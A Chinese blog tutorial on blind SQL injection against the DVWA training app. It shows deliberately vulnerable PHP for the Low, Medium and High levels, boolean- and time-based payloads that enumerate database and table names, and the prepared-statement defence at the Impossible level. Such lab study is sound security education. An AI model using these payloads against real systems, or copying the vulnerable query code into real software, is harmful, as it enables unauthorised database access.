DVWA 之 SQL Injection(Blind)

汇总链接:

https://baynk.blog.csdn.net/article/details/100006641
------------------------------------------------------------------分割线------------------------------------------------------------------
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。在这里插入图片描述
盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注,下面对四种级别的代码进行分析。
由于这里将所有的报错信息都替换掉了,所以没法使用基于报错的盲注来完成。分别在Low和Medium中使用BooleanBase和TimeBase两种。

Low

服务器端核心代码

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?> 

可以看到,Low级别的代码对参数id没有做任何检查、过滤,存在明显的SQL注入漏洞,同时SQL语句查询返回的结果只有两种,“exists”或者“MISSING”两种,因此这里是盲注。

漏洞利用
首先演示基于布尔的盲注:
1.判断是否存在注入,注入是字符型还是数字型
输入1,显示相应用户存在:
在这里插入图片描述
输入1’,显示不存在:
在这里插入图片描述
输入1’ and 1=1 #,显示存在:
在这里插入图片描述
输入1’ and 1=2 #,显示不存在:
在这里插入图片描述
说明存在字符型的SQL盲注。

2.猜解当前数据库名
想要猜解数据库名,首先要猜解数据库名的长度,然后挨个猜解字符。
在这里插入图片描述
1’ and length(database())=4 # 猜到第四次才猜出库的长度为4。
下面采用二分法猜解数据库名。
输入1’ and ascii(substr(database(),1,1))>97#,显示存在,说明库名的第一个字符的ascii值大于97(小写字母a);
输入1’ and ascii(substr(database(),1,1))<122#,显示存在,说明库名的第一个字符的ascii值小于122(小写字母z);
输入1’ and ascii(substr(database(),1,1))<110#,显示存在,说明库名的第一个字符的ascii值小于110(小写字母n);
输入1’ and ascii(substr(database(),1,1))<104#,显示存在,说明库名的第一个字符的ascii值小于104(小写字母h);
输入1’ and ascii(substr(database(),1,1))<100#,显示不存在,说明库名的第一个字符的ascii值不小于100(小写字母d);
输入1’ and ascii(substr(database(),1,1))<101#,显示存在,说明库名的第一个字符的ascii值小于101(小写字母f);
则第一个字母为d;
输入1’ and ascii(substr(database(),2,1))>97#,显示存在,说明库名的第二个字符的ascii值大于97(小写字母a);

依次是可以推出整个的库名为“dvwa”;

3.猜解数据库中的表名
首先猜解数据库中表的数量:
1’ and (select count(table_name) from information_schema.tables where table_schema=database())=1#,显示不存在;
1’ and (select count(table_name) from information_schema.tables where table_schema=database())=2#,显示存在;
则表名一共有两个,接着挨个猜解表名,一样的先猜第一张表的长度,再猜第一张表的名字,然后再来猜测第二张表;
1’ and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=9 #可以用此命令来猜解第一张表的名字长度,也可以用下列命令来猜解第二张表的表名长度:
1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=5 #(这里的substr函数用法和之前猜表名的方法有一点不一样,请注意)
猜解表名后,继续用二分法猜表名
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>97 #

最后可以得出两张表名分别为guestbook、users。

4.猜解表中的字段名
5.猜解数据
用以上方法即可完成,就不一一表述了。

Medium

服务器端核心代码

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    //mysql_close();
}

?> 

可以看到,Medium级别的代码利用mysql_real_escape_string函数对特殊符号\x00,\n,\r,,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。

漏洞利用

虽然前端使用了下拉选择菜单,但我们依然可以通过抓包改参数id,提交恶意构造的查询参数。
这里使用基于时间的盲注来进行爆破。
1.判断是否存在注入,注入是字符型还是数字型
在Burpsuite中输入id=1 and sleep(5)#有明显延迟,说明为数字型注入。
在这里插入图片描述
2.猜解当前数据库名
首先猜解数据名的长度:
输入1 and if(length(database())=1,sleep(5),1)#并无延迟,继续爆破。。。
1 and if(length(database())=4,sleep(5),1)#有明显延迟,长度为4。
接着采用二分法猜解数据库名:
1 and if(ascii(substr(database(),1,1)>97,sleep(5),1)#,有延迟
1 and if(ascii(substr(database(),1,1)<122,sleep(5),1)#,有延迟
1 and if(ascii(substr(database(),1,1)<110,sleep(5),1)#,有延迟
1 and if(ascii(substr(database(),1,1)<104,sleep(5),1)#,有延迟
1 and if(ascii(substr(database(),1,1)<100,sleep(5),1)#,无延迟
1 and if(ascii(substr(database(),1,1)>100,sleep(5),1)#,无延迟
说明数据库名的第一个字符为小写字母d。重复上述步骤,得到库名为dvwa。
3.猜解数据库中的表名
首先猜解数据库中表的数量:
1 and if((select count(table_name) from information_schema.tables where table_schema=0x64767761)=2,sleep(5),1)#,有延迟,说明有两个表;
然后再依次猜表名的长度及表名;
1 and if(length((select table_name from information_schema.tables where table_schema=0x64767761 limit 1,1))=5,sleep(5),1)#,有延迟,说明第二张表的表名长度为5
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=0x64767761 limit 1,1),1,1))>97,sleep(5),1)#,有延迟
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=0x64767761 limit 1,1),1,1))<122,sleep(5),1)#,有延迟
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=0x64767761 limit 1,1),1,1))<110,sleep(5),1)#,无延迟
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=0x64767761 limit 1,1),1,1))>110,sleep(5),1)#,有延迟
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=0x64767761 limit 1,1),1,1))>116,sleep(5),1)#,有延迟
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=0x64767761 limit 1,1),1,1))>119,sleep(5),1)#,无延迟
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=0x64767761 limit 1,1),1,1))<118,sleep(5),1)#,有延迟,说明第二张表的第一个字段为u。
依次也能知道第二张表名为users。
4.猜解表中的字段名
5.猜解数据
用以上方法即可完成,就不一一表述了。

High

服务器端核心代码

<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?> 

可以看到,High级别的代码利用cookie传递参数id,当SQL查询结果为空时,会执行函数sleep(seconds),目的是为了扰乱基于时间的盲注。同时在 SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果。

漏洞利用

虽然添加了LIMIT 1,但是我们可以通过#将其注释掉。但由于服务器端执行sleep函数,会使得基于时间盲注的准确性受到影响,这里用上面两种方法任意一种即可进行爆破。这里就不再一一说明步骤了。

Impossible

服务器端核心代码

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();

        // Get results
        if( $data->rowCount() == 1 ) {
            // Feedback for end user
            echo '<pre>User ID exists in the database.</pre>';
        }
        else {
            // User wasn't found, so the page wasn't!
            header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

            // Feedback for end user
            echo '<pre>User ID is MISSING from the database.</pre>';
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?> 

可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,Anti-CSRF token机制的加入了进一步提高了安全性。

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 成长之路 设计师:Amelia_0503 返回首页